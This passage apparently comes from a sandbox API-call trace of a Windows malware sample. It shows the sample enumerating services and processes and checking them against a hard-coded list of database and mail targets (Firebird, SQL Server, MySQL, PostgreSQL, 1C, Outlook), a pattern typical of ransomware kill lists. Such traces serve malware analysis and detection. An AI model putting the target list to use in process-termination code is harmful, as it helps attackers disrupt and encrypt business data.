lpString2="AudioEndpointBuilder") returned 1 [0036.048] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0036.048] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0036.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0036.048] lstrlenW (lpString="AudioSrv") returned 8 [0036.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0036.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0036.048] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0036.048] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0036.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0036.048] lstrlenW (lpString="BFE") returned 3 [0036.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0036.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0036.048] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0036.048] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0036.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0036.048] lstrlenW (lpString="CryptSvc") returned 8 [0036.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0036.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0036.048] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0036.048] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0036.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0036.048] lstrlenW (lpString="CscService") returned 10 [0036.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0036.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0036.048] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0036.048] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0036.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0036.048] lstrlenW (lpString="DcomLaunch") returned 10 [0036.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.049] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0036.049] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0036.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0036.049] lstrlenW (lpString="Dhcp") returned 4 [0036.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0036.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0036.049] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0036.049] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0036.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0036.049] lstrlenW (lpString="Dnscache") returned 8 [0036.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0036.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0036.049] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0036.049] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0036.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0036.049] lstrlenW (lpString="DPS") returned 3 [0036.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0036.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0036.049] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0036.049] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0036.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0036.049] lstrlenW (lpString="eventlog") returned 8 [0036.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0036.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0036.049] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0036.049] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0036.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0036.049] lstrlenW (lpString="EventSystem") returned 11 [0036.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0036.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0036.049] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0036.049] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0036.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0036.050] lstrlenW (lpString="gpsvc") returned 5 [0036.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0036.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0036.050] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0036.050] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0036.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0036.050] lstrlenW (lpString="iphlpsvc") returned 8 [0036.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.050] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0036.050] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0036.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0036.050] lstrlenW (lpString="LanmanServer") returned 12 [0036.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0036.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0036.050] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0036.050] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0036.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0036.050] lstrlenW (lpString="LanmanWorkstation") returned 17 [0036.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.050] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0036.050] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0036.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0036.050] lstrlenW (lpString="lmhosts") returned 7 [0036.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0036.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0036.050] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0036.050] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0036.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0036.050] lstrlenW (lpString="MMCSS") returned 5 [0036.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0036.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0036.050] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0036.050] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0036.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0036.051] lstrlenW (lpString="MpsSvc") returned 6 [0036.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0036.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0036.051] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0036.051] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0036.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0036.051] lstrlenW (lpString="Netman") returned 6 [0036.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0036.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0036.051] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0036.051] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0036.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0036.051] lstrlenW (lpString="netprofm") returned 8 [0036.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0036.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0036.051] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0036.051] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0036.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0036.051] lstrlenW (lpString="NlaSvc") returned 6 [0036.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0036.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0036.051] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0036.051] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0036.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0036.051] lstrlenW (lpString="nsi") returned 3 [0036.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0036.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0036.051] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0036.051] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0036.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0036.051] lstrlenW (lpString="PcaSvc") returned 6 [0036.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0036.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0036.051] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0036.051] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0036.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0036.052] lstrlenW (lpString="PlugPlay") returned 8 [0036.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0036.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0036.052] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0036.052] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0036.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0036.052] lstrlenW (lpString="Power") returned 5 [0036.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0036.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0036.052] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0036.052] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0036.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0036.052] lstrlenW (lpString="ProfSvc") returned 7 [0036.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0036.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0036.052] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0036.052] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0036.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0036.052] lstrlenW (lpString="RpcEptMapper") returned 12 [0036.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.052] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0036.052] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0036.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0036.052] lstrlenW (lpString="RpcSs") returned 5 [0036.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0036.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0036.052] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0036.052] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0036.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0036.052] lstrlenW (lpString="SamSs") returned 5 [0036.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0036.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0036.052] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0036.052] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0036.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0036.053] lstrlenW (lpString="Schedule") returned 8 [0036.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0036.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0036.053] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0036.053] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0036.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0036.053] lstrlenW (lpString="SENS") returned 4 [0036.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0036.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0036.053] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0036.053] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0036.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0036.053] lstrlenW (lpString="ShellHWDetection") returned 16 [0036.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.053] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0036.053] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0036.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0036.053] lstrlenW (lpString="Spooler") returned 7 [0036.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0036.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0036.053] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0036.053] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0036.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0036.053] lstrlenW (lpString="SysMain") returned 7 [0036.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0036.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0036.053] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0036.053] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0036.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0036.053] lstrlenW (lpString="Themes") returned 6 [0036.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0036.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0036.053] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0036.054] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0036.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0036.054] lstrlenW (lpString="TrkWks") returned 6 [0036.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0036.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0036.054] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0036.054] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0036.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0036.054] lstrlenW (lpString="UxSms") returned 5 [0036.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0036.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0036.054] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0036.054] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0036.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0036.054] lstrlenW (lpString="WdiServiceHost") returned 14 [0036.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.054] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0036.054] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0036.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0036.054] lstrlenW (lpString="WdiSystemHost") returned 13 [0036.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.054] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0036.054] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0036.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0036.054] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0036.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.054] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0036.054] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0036.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0036.054] lstrlenW (lpString="Winmgmt") returned 7 [0036.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0036.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0036.054] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0036.055] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0036.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0036.055] lstrlenW (lpString="WPDBusEnum") returned 10 [0036.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.055] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0036.055] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0036.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0036.055] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x661da0 | out: hHeap=0x570000) returned 1 [0036.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0036.057] Process32FirstW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0036.058] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0036.058] lstrlenW (lpString="System") returned 6 [0036.058] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0036.058] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0036.059] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0036.059] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0036.059] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0036.059] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0036.059] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0036.059] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0036.060] lstrlenW (lpString="smss.exe") returned 8 [0036.060] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0036.060] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0036.060] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0036.060] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0036.060] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0036.060] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0036.060] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0036.060] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.060] lstrlenW (lpString="csrss.exe") returned 9 [0036.060] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.061] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0036.061] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.061] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0036.061] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.061] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.061] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.061] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0036.061] lstrlenW (lpString="wininit.exe") returned 11 [0036.061] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0036.061] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0036.061] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0036.061] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0036.061] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0036.062] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0036.062] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0036.062] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.062] lstrlenW (lpString="csrss.exe") returned 9 [0036.062] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.062] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0036.062] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.062] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0036.062] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.062] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.063] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0036.063] lstrlenW (lpString="winlogon.exe") returned 12 [0036.063] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0036.064] lstrlenW (lpString="services.exe") returned 12 [0036.064] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0036.065] lstrlenW (lpString="lsass.exe") returned 9 [0036.065] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0036.065] lstrlenW (lpString="lsm.exe") returned 7 [0036.065] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.066] lstrlenW (lpString="svchost.exe") returned 11 [0036.066] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, 